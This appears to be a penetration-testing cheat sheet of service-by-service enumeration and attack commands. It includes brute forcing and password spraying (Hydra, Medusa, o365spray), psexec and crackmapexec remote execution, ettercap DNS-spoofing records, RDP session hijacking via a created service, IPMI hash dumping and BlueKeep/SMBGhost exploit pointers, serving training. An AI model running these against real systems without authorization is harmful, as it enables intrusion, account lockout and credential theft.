Protocols & Services
Infrastructure-based Enumeration
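# Certificate Transparency: collect every name that appears in certificates logged
# for the domain. jq extracts common_name and name_value directly (the old
# grep/cut chain had to undo jq's own pretty-printing and re-split the
# "\n"-joined name_value field); -r prints raw strings, so multi-name entries
# come out one per line. Wildcards (*.domain.com) are kept as-is. CT logs include
# expired/old certs, so resolve the result before treating a name as live.
curl -s 'https://crt.sh/?q=domain.com&output=json' \
  | jq -r '.[] | (.common_name, .name_value) | select(. != null)' \
  | sort -u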
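# Resolve each candidate subdomain and keep only those with an A record
# (CT data is full of stale names). Output: "<name> <ip>" (fields 1 and 4 of
# "name has address ip"); `grep domain.com` drops off-domain answers such as
# CNAME targets. A while/read loop replaces `for i in $(cat ...)`, which
# word-splits and glob-expands entries such as "*.domain.com".
while IFS= read -r sub; do
  [ -n "$sub" ] || continue
  host "$sub" | grep "has address" | grep domain.com | cut -d" " -f1,4
done < subdomainlist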
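# Look up each IP address in the list on Shodan (passive: nothing is sent to the
# target). The CLI needs an API key configured first (`shodan init <key>`).
# while/read instead of `for i in $(cat ...)` so blank lines and odd tokens are
# not word-split or glob-expanded.
while IFS= read -r ip; do
  [ -n "$ip" ] || continue
  shodan host "$ip"
done < ip-addresses.txt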
# Cloud Resources
https://domain.glass
https://buckets.grayhatwarfare.com
# Google dorking
intext:domain.com inurl:blob.core.windows.net
intext:domain.com inurl:amazonaws.com
Host-based Enumeration
FTP / 21
# Interact with the FTP service on the target (plain-text control channel: read the
# banner for product/version hints and try anonymous:anonymous first).
ftp <FQDN/IP>
nc -nv <FQDN/IP> 21
telnet <FQDN/IP> 21
# Interact with the FTP service on the target using an encrypted connection
# (explicit FTPS: s_client issues AUTH TLS on the plain port 21).
openssl s_client -connect <FQDN/IP>:21 -starttls ftp
# Download all available files on the target FTP server (recursive mirror, anonymous login).
# --no-passive forces active mode, i.e. the server connects back to your host for the
# data channel; drop it if the transfer stalls behind NAT/firewalls.
wget -m --no-passive ftp://anonymous:anonymous@<target>
# Brute forcing with Medusa: one user, whole wordlist. Noisy (one failed login per
# attempt) and may trigger lockout or blocking - confirm the policy and authorization first.
medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp
# FTP Bounce Attack: -b makes nmap abuse the FTP server's PORT command so the scan of
# 172.17.0.2:80 is sourced from the FTP server, reaching hosts only it can see.
nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2
SMB / 139 , 445
# Enumerating SMB shares using null session authentication (empty user and password).
crackmapexec smb <IP> --shares -u '' -p ''
smbclient -N -L //<IP>
smbclient //<IP>/<share> # Connect to a specific SMB share (-N for a null session, -U <user> otherwise).
smbmap -H <IP> -r # -r or -R: list the share contents recursively
smbmap -H <IP> --download "notes\note.txt" # download a file (path relative to the share, backslash-separated)
# Interaction with the target using RPC (null session: press Enter at the password
# prompt, or add -N). The commands that follow are typed at the rpcclient $> prompt.
rpcclient -U "" <FQDN/IP>
srvinfo # Server information (platform id, OS version, server type).
enumdomains # Enumerate all domains that are deployed in the network.
querydominfo # Provides domain, server, and user information of deployed domains.
netshareenumall # Enumerates all available shares.
netsharegetinfo <share> # Provides information about a specific share (path, permissions).
enumdomusers # Enumerates all domain users with their RIDs.
queryuser <RID> # Provides information about a specific user; use the RID printed by enumdomusers (e.g. 0x1f4).
# Username enumeration using Impacket scripts (SAMR; works over a null session when the
# server permits it, otherwise supply credentials).
samrdump.py <FQDN/IP>
# SMB enumeration using enum4linux (-A runs all simple enumeration checks; see --help for -C).
enum4linux-ng.py <FQDN/IP> -A -C
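# Interacting with SMB using CMD
C:\htb> dir \\192.168.220.129\Finance\
# Map the share as N:. The password is on the command line here and lands in the
# console history; `net use n: \\host\share /user:plaintext *` prompts for it instead.
C:\htb> net use n: \\192.168.220.129\Finance /user:plaintext Password123
C:\htb> dir n: /a-d /s /b # list all files in n: (/a-d files only, /s recursive, /b bare paths)
C:\htb> dir n: /a-d /s /b | findstr /i cred # search for specific names in files (filter the file list by name)
C:\htb> findstr /s /i cred n:\*.* # search for a specific word within a file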
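# Interacting with SMB using PowerShell
Get-ChildItem \\192.168.220.129\Finance\
# Authenticate to a share
# NOTE: a literal password in a script ends up in the console history / transcript.
# Interactively, `$cred = Get-Credential` replaces the four lines below.
$username = 'us3r'
$password = 'P@sswd'
$secpassword = ConvertTo-SecureString $password -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
New-PSDrive -Name "N" -Root "\\10.10.0.9\Finance" -PSProvider "FileSystem" -Credential $cred
# Search for specific names in files (-File: files only; *cred* is matched against the name)
Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
# Search for a specific word within a file
# -File added: without it every directory object is piped into Select-String too and
# produces a "cannot be read" error for each one.
Get-ChildItem -Recurse -Path N:\ -File | Select-String "cred" -List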
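# Interacting with SMB using Linux
# Inline username=/password= options are visible in `ps` and in the shell history for as
# long as the mount command runs / the history lives. The second form reads them from a
# mode-600 credentials file instead (same option keys, one per line).
sudo mount -t cifs -o username=us3r,password=P@sswd,domain=. //10.10.0.9/Finance /mnt/Finance
printf 'username=us3r\npassword=P@sswd\ndomain=.\n' > ~/.smbcreds && chmod 600 ~/.smbcreds
sudo mount -t cifs -o credentials="$HOME/.smbcreds" //10.10.0.9/Finance /mnt/Finance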
# Connect to a remote machine with a local administrator (alternatives: impacket-smbexec, impacket-atexec).
# psexec writes a service binary to ADMIN$ and registers a service - reliable, but it
# leaves service-install events and a file on disk; smbexec/atexec drop no binary.
# The single quotes stop bash from history-expanding the '!' in the password.
impacket-psexec administrator:'Password123!'@10.10.110.17
# Execute command with cme (--exec-method picks the lateral-movement technique; smbexec
# runs the command through a short-lived service without uploading a binary).
crackmapexec smb 10.10.1.2 -u Administrator -p 'P@sswd' -x 'whoami' --exec-method smbexec
# CVE-2020-0796 "SMBGhost": pre-auth RCE in the SMBv3.1.1 compression handling of
# Windows 10 / Server 1903 and 1909. Unpatched hosts still advertise dialect 3.1.1
# (nmap --script smb-protocols); public PoCs are unstable and can crash the host.
NFS / 2049
# Nmap: version scan plus every nfs-* NSE script (showmount, ls, statfs); 111 is the
# portmapper, 2049 the NFS service itself.
sudo nmap --script nfs* <FQDN/IP> -sV -p111,2049
# Show available NFS shares (exports) and the clients/networks allowed to mount them.
showmount -e <FQDN/IP>
# Mount the specific NFS share to ./target-NFS (create the directory first; -o nolock
# skips NLM file locking so the mount works without lockd/statd). Ownership shows as
# numeric uid/gid: a local user created with the same uid can read files that are not
# world-readable, and root access depends on whether the export uses root_squash.
sudo mount -t nfs <FQDN/IP>:/<share> ./target-NFS/ -o nolock
# Unmount the specific NFS share (needs the same privileges as the mount, i.e. sudo).
umount ./target-NFS
DNS / 53
# ANY request to the specific nameserver (many servers now answer ANY with a minimal
# response per RFC 8482, so an empty result is not conclusive).
dig any <domain.tld> @<nameserver>
# NS request to the specific nameserver.
dig ns <domain.tld> @<nameserver>
# AXFR request to the specific nameserver, AKA DNS Zone Transfer: dumps the whole zone when
# an authoritative server is misconfigured to allow transfers from anyone.
dig axfr <domain.tld> @<nameserver>
fierce --domain zonetransfer.me
# Subdomain brute forcing (query the target's own nameserver to avoid cached/stale answers).
# dnsenum: -f wordlist, -o output file, -p 0 -s 0 skip the search-engine scraping step.
# subbrute: -s wordlist, -r resolver list (spreads queries over public resolvers).
dnsenum --dnsserver <nameserver> --enum -p 0 -s 0 -o subs.txt -f ~/wordlist.txt domain.htb
subbrute domain.htb -s ./wordlist.txt -r ./resolvers.txt
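# Subdomain brute forcing with plain dig: one query per wordlist entry against 10.1.1.1.
# `grep -v ';\|SOA'` drops dig's comment lines and the SOA returned for non-existent
# names, so only answer records survive; they are appended to subs.txt.
# while/read replaces `for sub in $(cat ...)`: no glob expansion of entries like "*",
# no word-splitting, and the entry is matched as a fixed string (-F --) so wordlist
# tokens that look like regex metacharacters or options cannot break grep.
while IFS= read -r sub; do
  [ -n "$sub" ] || continue
  dig "$sub.domain.htb" @10.1.1.1 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep -F -- "$sub" | tee -a subs.txt
done < wordlist.txt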
# DNS spoofing AKA DNS Cache Poisoning (local, on-path variant: you must be on the
# victim's L2 segment and ARP-spoof it against its gateway for the answers to be seen).
# Add the records below to etter.dns, then run ettercap with target 1 = the victim,
# target 2 = the gateway, and the dns_spoof plugin enabled.
cat /etc/ettercap/etter.dns
inlanefreight.com A 192.168.225.110 # Attacker IP: lookups for the apex are answered with this address
*.inlanefreight.com A 192.168.225.110 # wildcard: every subdomain is redirected as well
Email Services : SMTP : 25,465,587 / IMAP4 : 143,993 / POP3 : 110,995
# Version + default-script scan of every mail port in one pass.
sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 <IP>
# SMTP : 25,465,587 (465 = implicit TLS, 587 = submission, usually STARTTLS)
telnet <IP> 25
# VRFY, EXPN, RCPT TO : can be used to enumerate valid usernames. VRFY/EXPN are often
# disabled; RCPT TO usually still distinguishes "user unknown" from accepted.
smtp-user-enum -M RCPT -U userlist.txt [-D inlanefreight.htb] -t <IP>
# Password Attack : SMTP, POP3, IMAP4 - one password against a user list (spray);
# -f stops at the first valid pair. Check the lockout policy before running it.
hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3
# Open Relay: does the server accept mail for third-party sender/recipient pairs?
nmap -p25 -Pn --script smtp-open-relay <IP>
# swaks sends a real message - use a sender and recipient you control when confirming a relay.
swaks --from notif@domain.com --to employees@domain.com --header 'Subject: Company Notif' --body 'Hi All, Test message' --server 10.10.1.1
# IMAP4 : 143,993
# use Evolution for GUI
# Log in to the IMAPS service using cURL (-k: accept the self-signed certificate;
# the credentials go into the shell history).
curl -k 'imaps://<FQDN/IP>' --user <user>:<password>
# Connect to the IMAPS service (993, implicit TLS). For plain 143 with STARTTLS use
# `-connect <FQDN/IP>:143 -starttls imap` instead.
openssl s_client -connect <FQDN/IP>:imaps
# IMAPS Commands examples (typed inside the openssl session; "1" is the client-chosen
# tag the server echoes back - increment it to pair replies with requests)
1 LOGIN username password # User's login (plain text, protected only by the TLS tunnel).
1 LIST "" * # Lists all directories.
1 CREATE "INBOX" # Creates a mailbox with a specified name.
1 DELETE "INBOX" # Deletes a mailbox - destructive, do not run this on a live target.
1 RENAME "ToRead" "Important" # Renames a mailbox.
1 LSUB "" * # Returns a subset of names from the set of names that the User has declared as being active or subscribed.
1 SELECT INBOX # Selects a mailbox (the reply includes the message count).
1 UNSELECT INBOX # Exits the selected mailbox.
1 FETCH <ID> all # Retrieves data associated with a message in the mailbox ("all" = flags, date, size, envelope; use BODY[] for the full message).
1 CLOSE # Removes all messages with the Deleted flag set (expunge) and leaves the mailbox.
1 LOGOUT # Closes the connection with the IMAP server.
# POP3 : 110,995
# Connect to the POP3s service (995, implicit TLS).
openssl s_client -connect <FQDN/IP>:pop3s
# POP3s Commands examples (typed inside the openssl session)
USER username # Identifies the user : can be used for user enum when the server rejects unknown users already here (many only fail at PASS).
PASS password # Authentication of the user using its password.
STAT # Requests the number of saved emails from the server.
LIST # Requests from the server the number and size of all emails.
RETR id # Requests the server to deliver the requested email by ID.
DELE id # Marks the requested email for deletion (applied at QUIT) - destructive, avoid on a live target.
CAPA # Requests the server to display the server capabilities.
RSET # Requests the server to reset the transmitted information (undoes pending DELE marks).
QUIT # Closes the connection with the POP3 server (commits pending deletions).
# Cloud Enumeration
# Username enumeration and password spraying (o365spray, MailSniper, CredKing)
# --enum only checks which addresses exist in the tenant; no password is sent.
./o365spray.py --enum -U users.txt --domain msplaintext.xyz
# --spray: one password per user. --count/--lockout pace the attempts against the
# tenant's lockout policy (attempts per window / window length - check --help for the
# units); too aggressive a setting trips Azure AD smart lockout and locks real users out.
./o365spray.py --spray -U users.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz
SNMP / 161 UDP
# Bruteforcing community strings of the SNMP service (v1/v2c: the community string is the
# only authentication and travels in cleartext over UDP; 'public'/'private' are common defaults).
onesixtyone -c community-strings.list <FQDN/IP>
nmap -sU <FQDN/IP> -p 161 --script=snmp-brute -Pn --script-args snmp-brute.communitiesdb=snmp.txt
# Querying OIDs using snmpwalk (starts at the MIB-2 subtree when no OID is given; the
# output often contains hostnames, processes, installed software and credentials in config strings).
snmpwalk -v2c -c <community string> <FQDN/IP>
# Bruteforcing SNMP service OIDs (mass query; .1.* walks the whole tree - large output, noisy).
braa <community string>@<FQDN/IP>:.1.*
MySQL / 3306
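# Login to the MySQL server.
# A password glued to -p ends up in the shell history; a bare -p prompts for it instead
# (for repeated use, put it in ~/.my.cnf with mode 600).
mysql -u username -pPassword123 -h <FQDN/IP> # Linux
mysql -u username -p -h <FQDN/IP> # Linux, prompts for the password
mysql.exe -u username -pPassword123 -h <FQDN/IP> # Windows
# GUI Application for MSSQL, MySQL, PostgreSQL
dbeaver &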
MSSQL / 1433
# Banner Grabbing
nmap -Pn -sV -sC -p1433 10.10.10.125
# MSSQL Ping in Metasploit (queries the SQL Browser service on UDP 1434 for instance names and ports)
auxiliary/scanner/mssql/mssql_ping
# NMAP MSSQL Script Scan. mssql.password= (empty) tests a blank 'sa' password.
# CAUTION: ms-sql-xp-cmdshell executes a command on the host if xp_cmdshell is enabled
# (intrusive), and ms-sql-dump-hashes only returns data with sysadmin rights.
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP/FQDN>
IPMI / 623 UDP
# Nmap (IPMI listens on UDP 623; the script reports the version and supported auth types)
sudo nmap -sU --script ipmi-version -p 623 IP
# IPMI version detection (in msfconsole: use the module, set RHOSTS <IP>, run).
msf6 auxiliary(scanner/ipmi/ipmi_version)
# Dump IPMI hashes: IPMI 2.0's RAKP handshake hands out a salted SHA1 HMAC of the
# password for any requested username before authentication (CVE-2013-4786). The module
# ships a default username list; crack the output offline with `hashcat -m 7300`.
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes)
Linux Remote Management
# Remote security audit against the target SSH service: banner, key-exchange, host-key,
# cipher and MAC algorithms with known-weak ones flagged - no credentials needed.
ssh-audit.py <FQDN/IP>
# Log in to the SSH server using the SSH client : -v optional for verbosity (shows which
# authentication methods the server offers).
ssh [-v] <user>@<FQDN/IP>
# Log in to the SSH server using private key (the key file must be mode 600 or ssh refuses it).
ssh -i private.key <user>@<FQDN/IP>
# Enforce password-based authentication (skips any local keys the agent would offer first;
# fails fast if the server has PasswordAuthentication disabled).
ssh <user>@<FQDN/IP> -o PreferredAuthentications=password
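# Scanning for Rsync
sudo nmap -sV -p 873 <FQDN/IP>
# Probing for Accessible Shares (after the @RSYNCD banner, send "#list" to enumerate modules)
nc -nv <FQDN/IP> 873
# Enumerating an Open Share ("dev" is the module name; 127.0.0.1 is a placeholder for the target)
rsync -av --list-only rsync://127.0.0.1/dev
# Sync the share to the attack host. rsync with a single source and no destination only
# lists the files (same as --list-only), so a local target directory is required to copy.
rsync -av rsync://127.0.0.1/dev ./dev/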
RDP / 3389
# Nmap (rdp* = rdp-enum-encryption, rdp-ntlm-info, rdp-vuln-ms12-020)
nmap -sV -sC 10.129.201.248 -p3389 --script rdp*
# Check the security settings of the RDP service (NLA requirement, protocol and encryption levels).
rdp-sec-check.pl <FQDN/IP>
# Log in to the RDP server from Linux. xfreerdp: add /cert:ignore if the certificate
# prompt blocks you; older rdesktop versions lack NLA/CredSSP and fail against hardened hosts.
xfreerdp /u:<user> /p:"<password>" /v:<FQDN/IP>
rdesktop -u user <FQDN/IP>
# Password spraying: one password against a user list. Every failure is a logon-failure
# event on the target and counts toward the lockout threshold - check the policy first.
hydra -L users.txt -p 'password123' 192.168.2.143 rdp
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# RDP Session Hijacking: attach another user's (typically disconnected) session to ours without their password.
# We need SYSTEM privileges for this to work (tscon refuses to switch into a foreign session otherwise).
query user # lists sessions: USERNAME, SESSIONNAME (e.g. rdp-tcp#13), ID, STATE
tscon {TARGET_SESSION_ID} /dest:{OUR_SESSION_NAME} # target ID and our session name both come from `query user`
# Admin priv to SYSTEM priv by creating a service (services run as LocalSystem, so the
# tscon inside runs as SYSTEM). Note the mandatory space after "binpath=". The numbers
# (2, rdp-tcp#13) are examples from `query user`. Reported to no longer work on Server 2019 /
# current Windows 10 builds - verify on the target. Delete the service afterwards
# (sc.exe delete sessionhijack), it is an obvious artefact otherwise.
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
net start sessionhijack
# CVE-2019-0708 BlueKeep: pre-authentication RCE in RDP on Windows 7 / Server 2008 R2 and older (Windows 8 and later are not affected). Confirm exposure with the Metasploit scanner module before trying a PoC - public exploits are unstable and can crash the host: https://github.com/RICSecLab/CVE-2019-0708
WinRM / 5985
# Log in to the WinRM server.
# Windows PS: Test-WSMan only checks that a WinRM listener answers on the host (no credentials needed).
Test-WSMan <FQDN/IP>
# Linux (5985 = HTTP listener; add -S and -P 5986 for HTTPS). The account must be a local
# administrator or a member of Remote Management Users.
evil-winrm -i <FQDN/IP> -u <user> -p <password>
# Execute command using the WMI service (DCOM on 135 plus dynamic ports, not WinRM).
# Needs local administrator; drops no binary, but the command is spawned under
# WmiPrvSE.exe, which is a well-known detection signal.
wmiexec.py <user>:"<password>"@<FQDN/IP> "<system command>"
Oracle TNS / 1521
# Perform a variety of scans to gather information about the Oracle database services and its
# components (the "all" module guesses SIDs and tries default accounts - noisy, generates failed logins).
./odat.py all -s <FQDN/IP>
# Log in to the Oracle database (the password goes into the shell history; append "as sysdba"
# when the account holds that role).
sqlplus <user>/<pass>@<FQDN/IP>/<db>
# Upload a file with Oracle RDBMS via UTL_FILE (needs the privileges --sysdba grants):
# C:\\insert\\path is the remote directory, file.txt the remote name, ./file.txt the local file.
./odat.py utlfile -s <FQDN/IP> -d <db> -U <user> -P <pass> --sysdba --putFile C:\\insert\\path file.txt ./file.txt